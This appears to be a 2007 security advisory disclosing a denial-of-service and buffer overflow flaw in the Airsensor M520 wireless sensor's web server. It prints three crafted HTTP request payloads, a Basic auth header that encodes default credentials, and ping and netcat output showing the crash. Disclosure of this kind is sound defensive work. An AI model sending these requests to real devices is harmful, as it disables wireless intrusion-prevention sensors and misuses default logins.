|
Advisories
SYBSEC-ADV01: Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC
|
Title
|
Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC
|
|
ID
|
SYBSEC-ADV01
|
|
Severity
|
Medium - Remote DoS
|
|
History
|
15.AUG.2007 Vulnerability discovered
05.SEP.2007 Vendor contacted
|
|
Scope
|
Application Denial of Service
|
|
Platforms
|
Any
|
|
Author
|
|
|
URL
|
http://www.sybsecurity.com/advisors/SYBSEC-ADV01-Airsensor_M520_HTTPD_Remote_Preauth_Denial_Of_Service_and_Buffer_Overflow_PoC
|
|
Release
|
Public
|
|
Overview
|
AirDefense Enterprise is a wireless intrusion prevention system that monitors the airwaves 24x7 and
provides the most advanced solution for rogue detection and mitigation, intrusion detection, policy
monitoring and compliance, automated protection, forensic and incident analysis and remote troubleshooting.
|
|
Affected versions
|
The vulnerability has been reported in versions Airsensor
Firmware Version 4.3.1.1, Model = M520
Firmware version 4.4.1.4, Model = M520
|
|
Description
|
The vulnerability is caused due to an unspecified error in the cgi files filter used for configure
propierties. This can be exploited by sending a specially crafted HTTPS request (necessary authentication),
which will cause the HTTPS service on the system to crash.
Requisites: "Use DHCP" option interface mark "No"
|
|
Workaround
|
|
|
Acknowledgments
|
|
|
References
|
|
|
Details
|
DoS exploit 1:
GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1
Host: 192.168.100.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh
Authorization: Basic YWRtaW46YWlyc2Vuc29y
Screenshot:
DoS exploit 2:
GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1
Host: 192.168.100.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh
Authorization: Basic YWRtaW46YWlyc2Vuc29y
Screenshot:
DoS exploit 3:
https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1
Host: 192.168.100.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh
Authorization: Basic YWRtaW46YWlyc2Vuc29y
Screenshot:
Buffer Overflow LOG status
Screenshot:
Pinging:
> ping 192.168.100.100 -t
Pinging 192.168.100.100 with 32 bytes of data:
Before:
Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
After:
Hardware error.
Hardware error.
Hardware error.
Request timed out.
Request timed out.
Request timed out.
> nc -vvn 192.168.100.100 443
(UNKNOWN) [192.168.100.100] 443 (?): connection refused ? Ooops!
sent 0, rcvd 0: NOTSOCK
|
|
Exploit tool
|
|
|
search
